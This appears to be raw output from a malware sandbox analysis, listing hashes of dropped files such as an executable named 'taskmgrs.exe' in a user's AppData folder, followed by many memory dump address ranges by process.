caba0bd0cb0eda0710291f9754cfdef1a3d8fdb8b6d07f5d3e4d1e7b09c87f37032287ddef0a75485d6e685afa3510ee64453662e6c8d223ae171b392b58e493

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
9dd622d5b3765200973180d988583232

SHA1
25e81cbdfb1e953964f3f873b8f5a86708c51dc9

SHA256
77a6852e9b2a36a1c25d3df97f60129600082a10a024c35e3a52447c470a3ae0

SHA512
706289251433cdb8fe9b8d844658f8967e4c0095a0c34834f7cc6f03990c43e037a3a11069470319bb68eea4a1d1c1986020eaa46367cc24ce200e8413661d10

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
9dd622d5b3765200973180d988583232

SHA1
25e81cbdfb1e953964f3f873b8f5a86708c51dc9

SHA256
77a6852e9b2a36a1c25d3df97f60129600082a10a024c35e3a52447c470a3ae0

SHA512
706289251433cdb8fe9b8d844658f8967e4c0095a0c34834f7cc6f03990c43e037a3a11069470319bb68eea4a1d1c1986020eaa46367cc24ce200e8413661d10

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
C:\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
\Users\Admin\AppData\Roaming\taskmgrs.exe
MD5
1feff0ec132ec0b4a0d15d0ee00c57be

SHA1
e020f7e38adcadffe774463d15b648fc20e3d476

SHA256
0b85c64339f4fb161e5fe4972ebf6832f06969f3f5f05dbfd636c75bf61ea432

SHA512
7e2a05d24fd3ff35c12e242a64a5ba3d39e6784a027694a1680f279b12244b22472c5afe6308e44619b2388996537326d69092211ea1da39cb8815ed1a61102c

Download Submit
memory/468-67-0x0000000004962000-0x0000000004963000-memory.dmp

Filesize
4KB

Download
memory/468-72-0x0000000005690000-0x0000000005691000-memory.dmp

Filesize
4KB

Download
memory/468-66-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/468-79-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/468-78-0x00000000061E0000-0x00000000061E1000-memory.dmp

Filesize
4KB

Download
memory/468-77-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/468-87-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/468-62-0x0000000000000000-mapping.dmp

Download
memory/468-65-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/468-68-0x0000000001090000-0x0000000001091000-memory.dmp

Filesize
4KB

Download
memory/468-63-0x0000000076281000-0x0000000076283000-memory.dmp

Filesize
8KB

Download
memory/468-86-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/468-69-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/468-64-0x00000000009A0000-0x00000000009A1000-memory.dmp

Filesize
4KB

Download
memory/932-160-0x0000000000000000-mapping.dmp

Download
memory/952-158-0x0000000000000000-mapping.dmp

Download
memory/1124-139-0x0000000000581000-0x0000000000582000-memory.dmp

Filesize
4KB

Download
memory/1124-134-0x000000007EF40000-0x000000007EF41000-memory.dmp

Filesize
4KB

Download
memory/1124-126-0x0000000000000000-mapping.dmp

Download
memory/1124-132-0x0000000000580000-0x0000000000581000-memory.dmp

Filesize
4KB

Download
memory/1188-136-0x0000000000000000-mapping.dmp

Download
memory/1188-137-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/1340-140-0x0000000002011000-0x0000000002012000-memory.dmp

Filesize
4KB

Download
memory/1340-107-0x0000000000000000-mapping.dmp

Download
memory/1340-133-0x000000007EF40000-0x000000007EF41000-memory.dmp

Filesize
4KB

Download
memory/1340-122-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1616-90-0x0000000000000000-mapping.dmp

Download
memory/1616-104-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/1616-105-0x0000000004982000-0x0000000004983000-memory.dmp

Filesize
4KB

Download
memory/1624-157-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1624-148-0x000000000041E792-mapping.dmp

Download
memory/1632-150-0x000000000041E792-mapping.dmp

Download
memory/1632-156-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1648-141-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1648-155-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1648-142-0x000000000041E792-mapping.dmp

Download
memory/1716-125-0x0000000000000000-mapping.dmp

Download
memory/1716-135-0x000000007EF40000-0x000000007EF41000-memory.dmp

Filesize
4KB

Download
memory/1716-131-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/1716-138-0x00000000004C1000-0x00000000004C2000-memory.dmp

Filesize
4KB

Download
memory/1784-103-0x0000000004B42000-0x0000000004B43000-memory.dmp

Filesize
4KB

Download
memory/1784-123-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/1784-102-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/1784-120-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/1784-88-0x0000000000000000-mapping.dmp

Download
memory/2036-59-0x0000000072C41000-0x0000000072C44000-memory.dmp

Filesize
12KB

Download
memory/2036-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2036-60-0x00000000706C1000-0x00000000706C3000-memory.dmp

Filesize
8KB

Download
memory/2036-162-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download